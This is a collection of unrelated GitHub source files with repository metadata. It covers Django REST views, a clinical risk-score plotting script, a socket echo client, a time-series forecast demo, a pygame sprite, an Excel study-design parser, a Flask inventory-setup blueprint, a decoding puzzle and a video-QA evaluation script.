serializer=CommentSerializer(data=data)\n        #serializer=CommentSerializer(data=request.data)\n        if serializer.is_valid():\n            serializer.validated_data[\"post\"]=commentPost\n            serializer.save()\n            return Response(serializer.data,status=status.HTTP_201_CREATED)\n        else:\n            return Response(serializer.errors,status=status.HTTP_404_NOT_FOUND)\n\n#retrieve, update and delete using the post id and comment id\nclass CommentDetail(APIView): \n    def get(self,request,id,key):\n        comment=get_object_or_404(Comment,id=id,post=key)\n        serializer=CommentSerializer(comment)\n        return Response(serializer.data)\n    \n    def put(self,request,id,key):\n        comment=get_object_or_404(Comment,id=id,post=key)\n        serializer=CommentSerializer(comment,data=request.data)\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data)\n        else:\n            return Response(serializer.errors,status=status.HTTP_400_BAD_REQUEST)\n    def delete(self,request,id,key):\n        comment=get_object_or_404(Comment,id=id,post=key)\n        comment.delete()\n        return Response(status=status.HTTP_204_NO_CONTENT)\n    \nfrom rest_framework import generics\nfrom rest_framework import mixins\n#mixins cut down the duplicated serializer handling for each request method in an APIView.\n#List/Create/Retrieve/Update/Destroy+ModelMixin = listing, create+save, return a model instance, update+save, delete\n#usually combined with GenericAPIView to implement CRUD.\n#careful: a method named the same as one existing inside the mixin classes will be overridden!!! Choose names carefully!
\n\nclass PostListMixins(mixins.ListModelMixin,mixins.CreateModelMixin, generics.GenericAPIView):\n    #queryset and serializer_class must be set, as in the two lines below.\n    queryset = Post.objects.all()\n    serializer_class=PostSerializer\n    \n    def get(self,request,*args,**kwargs):\n        return self.list(request)\n    def post(self,request,*args,**kwargs):\n        return self.create(request,*args,**kwargs)\n\nclass PostDetailMixins(mixins.CreateModelMixin,mixins.RetrieveModelMixin,mixins.UpdateModelMixin, mixins.DestroyModelMixin,generics.GenericAPIView):\n    queryset= Post.objects.all()\n    serializer_class=PostSerializer\n    def get(self,request,*args,**kwargs):\n        return self.retrieve(request)\n    def put(self,request,*args,**kwargs):\n        return self.update(request,*args,**kwargs)\n    def delete(self,request,*args,**kwargs):\n        return self.destroy(request,*args,**kwargs)\n    \n#concrete generic views improve readability, since otherwise several mixins must be inherited\n# e.g. CreateAPIView inherits GenericAPIView and CreateModelMixin. \nclass PostListGenericAPIView(generics.ListCreateAPIView):\n    queryset=Post.objects.all()\n    serializer_class=PostSerializer\n    \nclass PostDetailGenericAPIView(generics.RetrieveUpdateDestroyAPIView):\n    queryset=Post.objects.all()\n    serializer_class=PostSerializer\n    \nfrom rest_framework import viewsets\n#with a viewset, as_view() goes here instead of in urls\n#a way to simplify the code\n#queryset and serializer can be handled in one place\n\n# ReadOnlyModelViewSet : list/retrieve only => good for speed. \n# ModelViewSet is the most commonly used. \nclass PostViewSet(viewsets.ModelViewSet):\n    queryset=Post.objects.all()\n    serializer_class=PostSerializer\n    \n#post_list = PostViewSet.as_view({\n#    'get':'list',\n#    'post':'create',\n#})\n#post_detail_vs = PostViewSet.as_view({\n#    'get':'retrieve',\n#    'put':'update',\n#    'patch':'partial_update',\n#    'delete':'destroy',\n#})\n\n    ","repo_name":"LikeLion-at-CAU-11th/Eunsoo-Choi","sub_path":"Django/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"5325432572","text":"import numpy as np\nimport pyodbc\nimport os\nimport helper.util_func as uf\nimport helper.util_ml as uml\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport _pickle as pickle\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\ndef generate_risk_score(data):\n    return\n\ndef plot_data_1(philips_resample_wide,keys,ncols = 2, show = True):\n\n    temp = philips_resample_wide['timestamp']\n    nrows = int(np.ceil(len(keys) / ncols))\n    fig, axes = plt.subplots(nrows=nrows, ncols=ncols, figsize=(15, 10))\n\n    for (key, ax) in zip(keys, axes.flatten()):\n        ax.plot(temp,philips_resample_wide[key])\n        philips_resample_wide[['timestamp',key]].plot(x='timestamp',y=key,ax=ax,label=key)\n        # plt.title(key)\n        # plt.ylabel(key)\n    plt.tight_layout()\n\n    if show:\n        plt.show()\n    return\n\ndef get_DCI_Model():\n\n    # 4.2b : Retrieve Model\n    # k_feats = 70\n    # result_dir = 'models/results_NO_ICP_TEMP_strt_dci/'\n    # #\n    # fileName = result_dir + str(k_feats) + \"/ML_Results_cumulative_one_min_RR_\" + str(k_feats) + \".p\"\n    # results_hours = pickle.load(open(fileName, \"rb\"),encoding='latin1')\n    # (classifier_max_auc, auc_val) = uml.get_max_classifier_before_dci(results_hours, classifier_name='EC',\n    #                                                                   classifier_at_dci=False, 
classifier_at_hour=-3.5,\n # toplot=False)\n # classifer_eval = classifier_max_auc\n # fout = open('models/DCI_Model.pickle', 'wb')\n # pickle.dump(classifer_eval, fout)\n\n classifier_eval = pickle.load(open('models/DCI_Model.pickle', \"rb\"), encoding='latin1')\n return classifier_eval\n\n# the function will generate risk scores and save the results in the figures\n# 1. The input to the function are\n# a. list of patients with their demographic information and\n# b. classifer\n# 2. Output - None, generates the risk scores and saves it under figures\n\ndef generate_risk_scores(dem_patients = None, classifier_eval=None,var_ranges=None):\n demographic_vars = ['Mean_CONTINUOUS_Age', 'Mean_CATEGORICAL_Sex', 'Mean_CONTINUOUS_HH', 'Mean_CONTINUOUS_MFS',\n 'Mean_CONTINUOUS_WFNS', 'Mean_CONTINUOUS_GCS']\n keys = ['HR', 'AR-M', 'AR-D', 'AR-S', 'SPO2', 'RR']\n for index, pat in dem_patients.iterrows():\n mrn = pat['MRN']\n print(mrn)\n dem_feats_value = pat[demographic_vars]\n if dem_feats_value['Mean_CATEGORICAL_Sex'] == 'F':\n dem_feats_value['Mean_CATEGORICAL_Sex'] = 0\n else:\n dem_feats_value['Mean_CATEGORICAL_Sex'] = 1\n dem_feats_value = dem_feats_value.to_frame('Value').reset_index().rename(columns={'index': 'Features'})\n\n admndt = pat['Admin']\n dischdt = pat['Discharge']\n\n if not os.path.isfile('data/' + str(mrn) + '.xlsx'): # get resampled data\n print('download data')\n if os.path.isfile('helper/data/' + str(mrn) + '.csv'): # get 1 second data\n philips = pd.read_csv('helper/data/' + str(mrn) + '.csv')\n if 'timestamp' in philips.keys():\n philips['timestamp'] = pd.to_datetime(philips['timestamp'])\n else:\n continue\n else:\n continue # commented below line as this is not required for Federated learning project\n # with pyodbc.connect(\"DSN=Cloudera ODBC Driver for Impala\", autocommit=True) as conn:\n # philips = pd.read_sql(query, conn)\n philips['sublabel'] = philips['sublabel'].replace({\n 'ARTm': 'AR-M',\n 'ABPm': 'AR-M',\n 'ARTd': 'AR-D',\n 'ABPd': 'AR-D',\n 'ARTs': 'AR-S',\n 'ABPs': 'AR-S',\n 'SpO₂': 'SPO2' ## (MM) This line was missing, this will ignore SPO2\n })\n if 'AR-M' not in np.unique(philips['sublabel']) or 'AR-D' not in np.unique(philips['sublabel']):\n continue\n # downsample and save this data\n for k in keys:\n philips.loc[\n (philips['sublabel'] == k) & (philips['value'] > var_ranges.get(k)['max']), 'value'] = np.nan\n philips.loc[\n (philips['sublabel'] == k) & (philips['value'] <= var_ranges.get(k)['min']), 'value'] = np.nan\n # Step 4 : Downsample to a min\n # philips= philips.set_index('timestamp')\n philips_resample = philips.groupby(['sublabel']).resample('60s', on='timestamp').median().reset_index()\n philips_resample = philips_resample[philips_resample['sublabel'].isin(keys)]\n philips_resample.to_excel('helper/' + str(mrn) + '.xlsx')\n # Step 4.1 : Convert to wide format as we are using only wide format\n # philips1_resample_wide = philips_resample_wide\n # philips1_resample_wide.loc[(philips1_resample_wide['timestamp'] > '2021-12-25') & (philips1_resample_wide['timestamp'] < '2021-12-26'), keys] = np.nan\n # philips1_resample_wide = philips1_resample_wide.loc[philips1_resample_wide['timestamp'] < '2021-12-27']\n else:\n philips_resample = pd.read_excel(('data/' + str(mrn) + '.xlsx'))\n\n philips_resample_wide = philips_resample.pivot(index='timestamp', columns='sublabel',\n values='value').reset_index()\n philips_resample_wide['mrn'] = mrn\n philips_resample_wide = philips_resample_wide.ffill() # forward fill missing data\n\n # Step 2: Create 
features ( xcorr feats)\n        pat_predictor_vals = uml.compute_xcorr_feats_Impala(philips_resample_wide, dem_feats_value,\n                                                            keys=keys)\n        # Generate Risk Scores\n        compute_hours = 1  # this gives risk scores hourly; if we change it to 12 then it will be one value every 12 hours\n        (probab_vals, timevals1) = uml.compute_RiskScores_Impala(classifier_eval, pat_predictor_vals, 'EC', keys=keys,\n                                                                 include_dems=True, compute_hours=compute_hours)\n        # philips1 = philips_resample[philips_resample['sublabel'].isin(keys)]\n        plot_data_1(philips_resample_wide, keys, ncols=3)\n        plt.savefig('figures/' + str(mrn) + '_raw_data.png')\n        plt.close('all')\n\n        # plt.style.use('dark_background')\n        plt.figure()\n        plt.plot(timevals1, probab_vals, 'o-')\n        plt.ylim([0.1, 1])\n        plt.title('Risk Score')\n        plt.xlabel('Time')\n        plt.ylabel('Risk Scores')\n        plt.xticks(rotation=45)\n        plt.tight_layout()\n        plt.axhline(y=0.35, color='red', linestyle='--')\n        plt.savefig('figures/' + str(mrn) + '_Risk_score.png')\n        plt.close('all')\n\n\nif __name__ == '__main__':\n    print('hello')\n\n    # step 0 : Get DCI Model\n    classifier_eval = get_DCI_Model()\n    # step 1: get patient\n    dem_patients = pd.read_excel('helper/CurrentPatientDemographic.xlsx')\n    dem_patients=dem_patients[~np.isnat(dem_patients['Admin'])]\n    dem_patients=dem_patients[~np.isnat(dem_patients['Discharge'])]\n    dem_patients.rename(columns=\n                        {'Age':'Mean_CONTINUOUS_Age',\n                         'HH':'Mean_CONTINUOUS_HH',\n                         'mFS':'Mean_CONTINUOUS_MFS',\n                         'Sex':'Mean_CATEGORICAL_Sex',\n                         'WFNS':'Mean_CONTINUOUS_WFNS',\n                         'GCS':'Mean_CONTINUOUS_GCS'},inplace=True)\n\n    # Step 1: Download all the data for the prospective patients\n    var_ranges_file = 'helper/Variable_Range.csv'\n    var_ranges = uf.get_min_max_var(var_ranges_file)\n\n    #step 2 : Generate risk scores and save them in figures\n    generate_risk_scores(dem_patients,classifier_eval=classifier_eval)\n\n\n","repo_name":"G2Lab/DCI_FL","sub_path":"helper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"1809814986","text":"import socket\nimport sys\nimport os\nimport threading\n\ndef usage():\n\t\tprint(\"syntax : echo_client <host> <port>\")\n\t\tprint(\"sample : echo_client 127.0.0.1 1234\")\n\ndef check_receive(client_socket):\n\twhile True:\n\t\ttry:\n\t\t\tdata = client_socket.recv(2048)\n\t\t\tif not data:\n\t\t\t\tbreak\n\t\t\telif data.decode() == \"quit\":\n\t\t\t\tbreak\n\t\t\tprint(\"[received from server]\")\n\t\t\tprint(data.decode())\n\t\t\tprint(\"Input Request : \")\n\t\texcept:\n\t\t\tpass\n\n\tprint(\"[Server closed]\")\n\tclient_socket.close()\n\tos._exit(1)\n\ndef start_client(client_socket ,addr):\n\n\tprint(\"[\",addr, \" connected]\")\n\ttry:\n\t\tthr = threading.Thread(target = check_receive, args = (client_socket,))\n\t\tthr.daemon = True\n\t\tthr.start()\n\t\tprint(\"Input Request >> \")\n\t\twhile True:\n\t\t\tdata = input()\n\t\t\tclient_socket.send(data.encode())\n\t\t\tif(data == \"quit\"):\n\t\t\t\tbreak\n\t\t\n\texcept KeyboardInterrupt:\n\t\tpass\n\n\tfinally:\n\t\tprint(\"\\n[\", addr, \" disconnected]\")\n\t\tclient_socket.close()\n\t\tsys.exit(0)\n\ndef main():\n\tusage()\n\tif len(sys.argv) != 3:\n\t\tprint(\"[Syntax Error]\")\n\t\tsys.exit(1)\n\t\t\n\thost = sys.argv[1]\n\tport = int(sys.argv[2])\n\taddr = (host,port)\n\ttry:\n\t\tclient_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\t\tclient_socket.connect(addr)\n\texcept Exception as e:\n\t\tprint(\"[Failed to connect]\")\n\t\tprint(e)\n\t\tsys.exit(1)\n\n\tstart_client(client_socket, addr)\n\nif __name__=='__main__':\n\tmain()","repo_name":"2jongseok/echo_client_server","sub_path":"echo_client.py","file_name":"echo_client.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"24948347632","text":"import matplotlib.pyplot as plt\nimport random\nrandomlist = []\nfor i in range(0,200):\n\tn = random.randint(1,30)\n\trandomlist.append(n)\n\n######## Using third party library.########\n\nimport pandas as pd\ndf = pd.DataFrame (randomlist, columns = ['number'])\nprint (df.number[:170])\n\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX\n# fit on the first 170 samples and forecast the remaining 30\nARMAmodel = SARIMAX(df.number[:170], order = (1, 0, 1))\nARMAmodel = ARMAmodel.fit()\n\npred = ARMAmodel.get_forecast(len(df.index) - 170)\npred_df = pred.conf_int(alpha = 0.05)\n\npred_df[\"Predictions\"] = ARMAmodel.predict(start = pred_df.index[0], end = pred_df.index[-1])\npred_df.index = df.index[170:]\npred_out = pred_df[\"Predictions\"]\n\nprint(pred_out)\n","repo_name":"pacle002/FastAPI-Test","sub_path":"AllDatas/Arma.py","file_name":"Arma.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"39213089458","text":"import pygame as pg\nimport ruamel.yaml\nimport pytweening as tween\n\nvec = pg.math.Vector2\n\n\nclass Item(pg.sprite.Sprite):\n    \"\"\"\n    Item class is used to place items on the map.\n    Items use tween animations from the pytweening library.\n    \"\"\"\n\n    def __init__(\n        self,\n        settings: ruamel.yaml.comments.CommentedMap,\n        game_client_data_item_img: pg.Surface,\n        pos: vec,\n        img,\n        kind: str,\n    ):\n        self.settings = settings\n        self._layer = self.settings[\"layer\"][\"item\"]\n        self.bob_range = self.settings[\"items\"][\"bob_range\"]\n        self.bob_speed = self.settings[\"items\"][\"bob_speed\"]\n        pg.sprite.Sprite.__init__(self)\n        self.image = game_client_data_item_img[img]\n        self.kind = kind\n        self.rect = self.image.get_rect()\n        self.pos = pos\n        self.rect.center = self.pos\n        self.tween = tween.easeInOutSine\n        self.step = 0\n        self.dir = 1\n\n    def update(self):\n        # item bobbing motion\n        offset = self.bob_range * (self.tween(self.step / self.bob_range) - 0.5)\n        self.rect.centery = self.pos[1] + offset * self.dir\n        self.step += self.bob_speed\n        if self.step > self.bob_range:\n            self.step = 0\n            self.dir *= -1\n","repo_name":"mgear2/undervoid","sub_path":"src/sprites/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"32644381145","text":"from usdm_excel.base_sheet import BaseSheet\nfrom usdm_excel.cross_ref import cross_references\nfrom usdm_excel.id_manager import id_manager\nimport traceback\nimport pandas as pd\nfrom usdm_model.indication import Indication\nfrom usdm_model.investigational_intervention import InvestigationalIntervention\n\nclass StudyDesignIISheet(BaseSheet):\n\n  def __init__(self, file_path):\n    try:\n      super().__init__(file_path=file_path, sheet_name='studyDesignII')\n      self.indications = []\n      self.interventions = []\n      for index, row in self.sheet.iterrows():\n        xref = self.read_cell_by_name(index, [\"xref\", \"name\"])\n        type = self.read_cell_by_name(index, \"type\")\n        description = self.read_description_by_name(index, \"description\")\n        label = self.read_cell_by_name(index, 'label', default=\"\")\n        codes = self.read_other_code_cell_multiple_by_name(index, \"codes\")
\n        if type.upper() == \"IND\":\n          try:\n            item = Indication(id=id_manager.build_id(Indication), name=xref, description=description, label=label, codes=codes)\n          except Exception as e:\n            self._general_error(f\"Failed to create Indication object, exception {e}\")\n            self._traceback(f\"{traceback.format_exc()}\")\n          else:\n            self.indications.append(item)\n            cross_references.add(xref, item)\n        else:\n          try:\n            item = InvestigationalIntervention(id=id_manager.build_id(InvestigationalIntervention), description=description, codes=codes)\n          except Exception as e:\n            self._general_error(f\"Failed to create InvestigationalIntervention object, exception {e}\")\n            self._traceback(f\"{traceback.format_exc()}\")\n          else:\n            self.interventions.append(item)\n            cross_references.add(xref, item) \n    except Exception as e:\n      self._general_error(f\"Exception [{e}] raised reading sheet.\")\n      self._traceback(f\"{traceback.format_exc()}\")\n\n","repo_name":"data4knowledge/usdm","sub_path":"src/usdm_excel/study_design_ii_sheet/study_design_ii_sheet.py","file_name":"study_design_ii_sheet.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"6514850949","text":"import os\nimport re\nimport yaml\nfrom flask import Blueprint, render_template, request\nfrom functions.bbui import load_yaml,save_yaml\n\ndef Merge(dict1, dict2):\n    # merge two dicts into a new dict; values from dict2 take precedence on duplicate keys\n    return {**dict1, **dict2}\n\ninitialize = Blueprint('initialize', __name__, template_folder='templates')\n\n##### INITIALIZE\n\n@initialize.route(\"/initialize/index.html\")\ndef initialize_index():\n    return render_template(\"page.html.j2\", page_content_path=\"initialize/index.html\", page_title=\"Initialize\")\n\n@initialize.route(\"/initialize/step_1.html\")\ndef initialize_step_1():\n    print('initialize_step_1')\n    return render_template(\"page.html.j2\", page_content_path=\"initialize/step_1.html\", page_title=\"Initialization - Step 1\")\n\n@initialize.route(\"/initialize/step_2.html\", methods = ['POST'])\ndef initialize_step_2():\n\n    global initialization_form\n\n    if request.method == 'POST':\n        initialization_form = {}\n        print('initialize_step_2 POST')\n        print(request.form)\n        initialization_form = request.form.to_dict()\n        print('Value' + str(initialization_form))\n    return render_template(\"page.html.j2\", page_content_path=\"initialize/step_2.html\", page_title=\"Initialization - Step 2\")\n\n@initialize.route(\"/initialize/step_3.html\", methods = ['POST'])\ndef initialize_step_3():\n\n    global initialization_form\n\n    if request.method == 'POST':\n        print('initialize_step_3 POST')\n        print(request.form)\n        initialization_form = Merge(initialization_form,request.form.to_dict())\n        print('Value' + str(initialization_form))\n    return render_template(\"page.html.j2\", page_content_path=\"initialize/step_3.html\", page_title=\"Initialization - Step 3\")\n\n@initialize.route(\"/initialize/report.html\", methods = ['POST'])\ndef initialize_report():\n\n    global initialization_form\n\n    if request.method == 'POST':\n        print('initialize_report POST')\n        print(request.form)\n        initialization_form = Merge(initialization_form,request.form.to_dict())\n        print('Value' + str(initialization_form))\n        print('Creating new inventory.')\n        print(' - Backup and clean current existing inventory.')\n        os.system('mkdir -p /etc/bluebanquise/backups/')\n        os.system('tar cvJf /etc/bluebanquise/backups/previous_inventory.tar.xz /etc/bluebanquise/inventory/')\n        os.system('rm -Rf /etc/bluebanquise/inventory/')\n        print(' - Copy base inventory.')
\n        os.system('cp -a data/initialize/inventory/ /etc/bluebanquise/')\n        print(' - Setting parameters.')\n        yaml_buffer = load_yaml('/etc/bluebanquise/inventory/group_vars/all/general_settings/general.yml')\n        yaml_buffer['cluster_name'] = initialization_form['inventory_cluster_name']\n        yaml_buffer['time_zone'] = initialization_form['inventory_time_zone']\n        yaml_buffer['icebergs_system'] = initialization_form['inventory_icebergs_system']\n        save_yaml('/etc/bluebanquise/inventory/group_vars/all/general_settings/general.yml',yaml_buffer)\n        yaml_buffer = load_yaml('/etc/bluebanquise/inventory/group_vars/all/general_settings/network.yml')\n        yaml_buffer['domain_name'] = initialization_form['inventory_domain_name']\n        save_yaml('/etc/bluebanquise/inventory/group_vars/all/general_settings/network.yml',yaml_buffer)\n        yaml_buffer = load_yaml('/etc/bluebanquise/inventory/group_vars/all/equipment_all/equipment_profile.yml')\n        yaml_buffer['ep_operating_system']['distribution'] = initialization_form['ep_operating_system.distribution']\n        yaml_buffer['ep_operating_system']['distribution_major_version'] = initialization_form['ep_operating_system.distribution_major_version']\n        yaml_buffer['ep_configuration']['keyboard_layout'] = initialization_form['ep_configuration.keyboard_layout']\n        yaml_buffer['ep_configuration']['system_language'] = initialization_form['ep_configuration.system_language']\n        save_yaml('/etc/bluebanquise/inventory/group_vars/all/equipment_all/equipment_profile.yml',yaml_buffer)\n\n        print(str(yaml_buffer))\n    return render_template(\"page.html.j2\", page_content_path=\"initialize/report.html\", page_title=\"Initialization - Report\")\n","repo_name":"oxedions/bbui","sub_path":"UI2/blueprints/initialize/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"15425562114","text":"import sys\n\n\ndef bin_keys(max_length=7):\n    length = 1\n    while length <= max_length:\n        fstring = '{:0' + str(length) + 'b}'\n        for i in range(2**length - 1):\n            yield fstring.format(i)\n\n        length += 1\n\n\ndef make_header_map(header):\n    return dict((k, v) for k, v in zip(bin_keys(), header))\n\n\ndef decode(header, message):\n    # strip anything illegal from the message\n    message = \"\".join([c for c in message if c in ('0', '1')])\n    header_map = make_header_map(header)\n    decoded = []\n\n    def extract_segment(message):\n        segment = []\n        size, message = message[0:3], message[3:]\n        size = int(size, 2)\n\n        if size == 0:\n            # we've reached '000', the termination string\n            return ([], \"\")\n\n        key, message = message[0:size], message[size:]\n        while int(key, 2) != (2**(size) - 1):  # while the key isn't all ones\n            segment.append(key)\n            key, message = message[0:size], message[size:]\n\n        return segment, message\n\n    keep_going = True\n    while keep_going:\n        segment, message = extract_segment(message)\n        if not message:\n            keep_going = False\n\n        decoded.extend([header_map[key] for key in segment])\n\n    return \"\".join(decoded)\n\n\ndef find_last_header_char(s):\n    return max([(i, c) for i, c in enumerate(s) if c not in ('0', '1')])\n\n\ndef process_line(line):\n    line = line.strip()\n    if not line:\n        return\n\n    pos, _ = find_last_header_char(line)\n    pos += 1\n    header, message = line[0:pos], line[pos:]\n    print(decode(header, message))\n\n\ndef test():\n    line = '$#**\\\\0100000101101100011100101000'\n    
process_line(line)\n\nif __name__ == '__main__':\n with open(sys.argv[1]) as lines:\n for line in lines:\n process_line(line)\n","repo_name":"cmdouglas/codeeval","sub_path":"decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32464353075","text":"limit = int(input(\"Enter limit =>\"))\nsum=0\nnumber=0\ni = 1\nwhile i <= limit:\n print(i)\n sum=sum+i\n i = i + 1\n\nprint(\"The sum of all the numbers =>\",sum)","repo_name":"TheOriginalDev/Python","sub_path":"Python_Programs/extra/extra11.py","file_name":"extra11.py","file_ext":"py","file_size_in_byte":160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"705287533","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nimport random\nimport os\nimport os.path as osp\nimport logging\nfrom transformers import get_cosine_schedule_with_warmup, BertTokenizer\nfrom args import get_args\nfrom model.vqa_model import VGT\nfrom loss import LogSoftmax\nfrom util import compute_a2v, load_model_by_key, save_to\nfrom train.train_videoqa import train, eval\nfrom data.vqa_loader import get_videoqa_loaders\nfrom embed_loss import MultipleChoiceLoss\nimport h5py\nimport collections\nfrom util import compute_aggreeings, AverageMeter, get_mask, mask_tokens\nimport json\nimport pandas as pd\nfrom tqdm import tqdm\n\ntorch.backends.cudnn.enabled = False\ntorch.backends.cudnn.benchmark = True\n \n \ndef eval(model, data_loader, device, a2v, args, save_csv, test=False):\n model.eval()\n count = 0\n metrics, counts = collections.defaultdict(int), collections.defaultdict(int)\n columns=['qid', 'prediction', 'answer']\n \n with torch.no_grad():\n if not args.mc:\n model.module._compute_answer_embedding(a2v)\n results = []\n for i, batch in enumerate(tqdm(data_loader)):\n answer_id, answer, video_o, video_f, question, question_id = (\n batch[\"answer_id\"],\n batch[\"answer\"],\n batch[\"video_o\"].cuda(),\n batch[\"video_f\"].cuda(),\n batch[\"question\"].cuda(),\n batch['question_id']\n )\n \n video_len = batch[\"video_len\"]\n seq_len = batch[\"seq_len\"]\n question_mask = (question > 0).float()\n answer_mask = (answer > 0).float()\n video_mask = get_mask(video_len, video_f.size(1)).cuda()\n count += answer_id.size(0)\n video = (video_o, video_f)\n if not args.mc:\n predicts = model(\n video,\n question,\n text_mask=question_mask,\n video_mask=video_mask,\n seq_len = seq_len\n )\n topk = torch.topk(predicts, dim=1, k=10).indices.cpu()\n if args.dataset != \"ivqa\":\n answer_id_expanded = answer_id.view(-1, 1).expand_as(topk)\n else:\n answer_id = (answer_id / 2).clamp(max=1)\n answer_id_expanded = answer_id\n metrics = compute_aggreeings(\n topk,\n answer_id_expanded,\n [1, 10],\n [\"acc\", \"acc10\"],\n metrics,\n ivqa=(args.dataset == \"ivqa\"),\n )\n for bs, qid in enumerate(question_id):\n results.append([qid, int(topk.numpy()[bs,0]), int(answer_id.numpy()[bs])]) \n else:\n fusion_proj, answer_proj = model(\n video,\n question,\n text_mask=answer_mask,\n video_mask=video_mask,\n answer=answer.cuda(),\n seq_len = seq_len\n )\n # predicts = fusion_proj.squeeze() \n fusion_proj = fusion_proj.unsqueeze(2)\n predicts = torch.bmm(answer_proj, fusion_proj).squeeze()\n predicted = torch.max(predicts, dim=1).indices.cpu()\n metrics[\"acc\"] += (predicted == answer_id).sum().item()\n for bs, qid in 
enumerate(question_id):\n results.append([qid, int(predicted.numpy()[bs]), int(answer_id.numpy()[bs])])\n\n acc = metrics[\"acc\"] / count\n print(f\"Test accuracy: {acc}\")\n \n for k in metrics:\n # print(metrics[k], count)\n v = metrics[k] / count\n print(f\"{k}: {v:.3%}\")\n break\n df = pd.DataFrame(results, columns=columns)\n df.to_csv(save_csv, index=False)\n \n return results\n\ndef main(model_path, sample_list_path, feat_path, save_csv):\n args = get_args()\n torch.cuda.manual_seed(args.seed)\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n if not (os.path.isdir(args.save_dir)):\n os.mkdir(os.path.join(args.save_dir))\n logging.basicConfig(\n level=logging.INFO, format=\"%(asctime)s %(levelname)-8s %(message)s\"\n )\n logFormatter = logging.Formatter(\"%(asctime)s %(levelname)-8s %(message)s\")\n rootLogger = logging.getLogger()\n fileHandler = logging.FileHandler(os.path.join(args.save_dir, \"stdout.log\"), \"w+\")\n fileHandler.setFormatter(logFormatter)\n rootLogger.addHandler(fileHandler)\n logging.info(args)\n\n # get answer embeddings\n bert_tokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\")\n # special_tokens_dict = {'additional_special_tokens': ['[TSW]']}\n # bert_tokenizer.add_special_tokens(special_tokens_dict)\n \n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n \n a2id, id2a, a2v = None, None, None\n if not args.mc:\n a2id, id2a, a2v = compute_a2v(\n vocab_path=args.vocab_path,\n bert_tokenizer=bert_tokenizer,\n amax_words=args.amax_words,\n )\n logging.info(f\"Length of Answer Vocabulary: {len(a2id)}\")\n\n # Model\n model = VGT(\n bert_tokenizer = bert_tokenizer,\n feature_dim=args.feature_dim,\n word_dim=args.word_dim,\n N=args.n_layers,\n d_model=args.embd_dim,\n d_ff=args.ff_dim,\n h=args.n_heads,\n dropout=args.dropout,\n T=args.max_feats,\n Q=args.qmax_words,\n baseline=args.baseline,\n bnum=args.bnum,\n CM_PT=args.CM_PT,\n dataset=args.dataset\n )\n model.to(device)\n logging.info(\"Using {} GPUs\".format(torch.cuda.device_count()))\n\n # Load pretrain path\n model = nn.DataParallel(model)\n args.pretrain_path = model_path\n if args.pretrain_path != \"\":\n # model.load_state_dict(torch.load(args.pretrain_path))\n model.load_state_dict(load_model_by_key(model, args.pretrain_path))\n logging.info(f\"Loaded checkpoint {args.pretrain_path}\")\n logging.info(\n f\"Nb of trainable params:{sum(p.numel() for p in model.parameters() if p.requires_grad)}\"\n )\n\n args.test = True\n args.features_path = feat_path \n args.test_csv_path = osp.join(sample_list_path, \"test.csv\")\n _, _, test_loader = get_videoqa_loaders(args, args.features_path, a2id, bert_tokenizer, test_mode = args.test)\n\n if args.test:\n logging.info(\"number of test instances: {}\".format(len(test_loader.dataset)))\n\n # Training\n if args.test: \n # Evaluate on test set\n csv_save_path = osp.join(args.save_dir, 'VGT_test_results.csv')\n results = eval(model, test_loader, device, a2v, args, csv_save_path, test=True)\n\n\n\nif __name__ == \"__main__\":\n model_path=\"/home/adithyas/VGT_data/nextqa/VGT_B20_Web64/best_model.pth\"\n sample_list_path = '/home/adithyas/VGT_data/nextqa'\n feat_path = \"/home/adithyas/VGT_data/nextqa\"\n save_csv=\"/home/adithyas/11777-videoQA/atp-video-language/VGT_test_results.csv\"\n main(model_path, sample_list_path, feat_path, 
save_csv)","repo_name":"11777-MMML/11777-videoQA","sub_path":"VGT/test_VGT_models.py","file_name":"test_VGT_models.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
